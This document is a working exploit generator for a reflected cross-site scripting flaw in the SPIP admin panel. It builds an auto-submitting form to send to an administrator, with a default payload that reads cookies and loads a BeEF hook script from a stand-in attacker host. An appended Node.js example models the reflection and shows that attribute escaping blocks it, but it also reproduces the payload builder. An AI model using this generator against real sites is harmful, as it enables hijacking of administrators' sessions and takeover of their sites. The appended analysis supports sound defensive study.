Exploit generator:
------------------
<html>
<head>
<script>
// Strip newlines and tabs, then leading/trailing whitespace, so the user's
// input fits inside a single-line attribute value.
function trim(s){
  return s.replace(/\r\n|\r|\n|\t/g,'').replace(/^\s+/g,'').replace(/\s+$/g,'');
}

// Encode every character as a %XX (or %uXXXX) escape so the injected script
// carries no quotes or angle brackets of its own; the target page decodes it
// with unescape() at run time.
function encodeToHex(s){
  var r = "";
  var h;
  for(var c = 0; c < s.length; c++){
    h = s.charCodeAt(c).toString(16);
    if(h.length > 2){
      while(h.length < 4) h = "0" + h;
      r += "%u" + h;
    } else {
      if(h.length < 2) h = "0" + h;
      r += "%" + h;
    }
  }
  return r;
}

// Build a self-submitting POST form. The "name" attribute of the second hidden
// input closes the single-quoted attribute on the target page, injects a
// <script> element, then opens a dummy tag that swallows the remainder of the
// original input element.
function generateXSS(){
  var target  = trim(document.getElementById("target").value);
  var version = trim(document.getElementById("version").value);
  var content = trim(document.getElementById("content").value);
  var resultjs = "";
  resultjs += "<html><body><form name='x' action='" + target + "ecrire/?exec=" + version + "' method='post'>";
  resultjs += "<input type='hidden' name='exec' value='" + version + "' />";
  resultjs += "<input type='hidden' name=\"x'><script>eval(unescape('" + encodeToHex(content) + "'));<\/script><input=\" value='' />";
  resultjs += "</form><script>document.forms['x'].submit();<\/script></body></html>";
  document.getElementById("resultjs").value = resultjs;
}
</script>
</head>
<body onload="generateXSS();">
<h2>XSS in SPIP Core <=3.0.1 or <=2.1.14 admin panel (base repair)</h2>
<p>
This is a non-persistent (reflected) XSS reached through POST variables of the admin panel.<br />
The target is the "name" attribute of a hidden input element.<br />
This XSS works on Firefox 13 and IE7, but does not work on Chrome.<br />
magic_quotes_gpc = Off is required.
</p>
<form action="" onsubmit="generateXSS();return false;">
<table>
<tr>
<td>Targeted SPIP URL:</td>
<td><input id="target" type="text" value="http://target/spip/" size="70" onkeyup="generateXSS();" /></td>
</tr>
<tr>
<td>SPIP version:</td>
<td>
<select id="version" onchange="generateXSS();">
<option value="base_repair">3.0.X (up to 3.0.1 included)</option>
<option value="admin_repair">2.1.X (up to 2.1.14 included)</option>
</select>
</td>
</tr>
<tr>
<td>JavaScript code to execute:<br />(without &lt;script&gt; and &lt;/script&gt; tags)</td>
<td>
<textarea cols="70" rows="10" id="content" onkeyup="generateXSS();">
alert(document.cookie);
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "http://ha.ck.er.xxx/beEf.js";
document.body.appendChild(script);
</textarea>
</td>
</tr>
<tr>
<td>Exploit to send to an admin:</td>
<td>
<textarea cols="70" rows="10" id="resultjs" readonly="readonly"></textarea>
</td>
</tr>
</table>
</form>
</body>
</html>
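The following is an added example, not code from the advisory or from SPIP: it models the reflection the generator relies on. A page that echoes a POST value verbatim into a single-quoted name attribute lets the payload break out of the attribute and plant a script element; the same value passed through attribute escaping cannot. The reflection functions are hypothetical stand-ins, not SPIP's templates. The last scenario models PHP's magic_quotes_gpc as addslashes() applied to the POST value (an assumption about why the advisory requires it to be off) and checks whether the injected inline script still parses. The encoder also handles characters above 0xFF with %uXXXX, which goes beyond what the generator above does.

```javascript
// Added example (not from the original advisory). Node.js, no dependencies.

// Encode every character as a %XX (or %uXXXX) escape; the injected script
// decodes it with unescape(), so the payload carries no quotes or brackets.
function encodeToHex(s) {
  let r = "";
  for (let i = 0; i < s.length; i++) {
    const h = s.charCodeAt(i).toString(16);
    r += h.length > 2 ? "%u" + h.padStart(4, "0") : "%" + h.padStart(2, "0");
  }
  return r;
}

// The attribute-breaking value the generator puts into the hidden input's name:
// close the single-quoted attribute and its tag, inject a script, then open a
// dummy tag that swallows the remainder of the original input element.
function buildPayload(js) {
  return "x'><script>eval(unescape('" + encodeToHex(js) + "'));</script><input=";
}

// Vulnerable pattern (hypothetical, not SPIP's code): the POST value is
// reflected verbatim inside name='...'.
function reflectUnescaped(value) {
  return "<input type='hidden' name='" + value + "' value='' />";
}

// Hardened pattern: escape every character that matters inside a quoted
// attribute before reflecting it.
function escapeAttr(value) {
  return value
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function reflectEscaped(value) {
  return "<input type='hidden' name='" + escapeAttr(value) + "' value='' />";
}

// Did the reflected markup gain a <script> element?
function containsScriptTag(html) {
  return /<script>/i.test(html);
}

// Assumed model of magic_quotes_gpc: PHP's addslashes() applied to the value,
// i.e. a backslash before every quote, backslash and NUL.
function addslashes(value) {
  return value.replace(/([\\'"])/g, "\\$1").replace(/\0/g, "\\0");
}

// Extract the injected script body and check whether it is syntactically valid
// JavaScript. new Function() only compiles the text, it never runs the payload.
function inlineScriptParses(html) {
  const m = html.match(/<script>([\s\S]*?)<\/script>/i);
  if (!m) return false;
  try {
    new Function(m[1]);
    return true;
  } catch (e) {
    return false;
  }
}

// Run the three scenarios for one piece of attacker JavaScript.
function assessReflection(js) {
  const payload = buildPayload(js);
  const raw = reflectUnescaped(payload);
  return {
    // unescaped reflection: script tag lands and its body parses
    unescaped: containsScriptTag(raw) && inlineScriptParses(raw),
    // attribute-escaped reflection: no script tag at all
    escaped: containsScriptTag(reflectEscaped(payload)),
    // unescaped reflection but quotes backslashed: tag lands, script is broken
    unescapedWithMagicQuotes: inlineScriptParses(reflectUnescaped(addslashes(payload))),
  };
}

console.log(assessReflection("alert(document.cookie)"));
```

Running the block with node prints `{ unescaped: true, escaped: false, unescapedWithMagicQuotes: false }`: the attribute escape is what actually closes the hole, while backslashed quotes merely break this particular payload's inline script and still let the tag injection through.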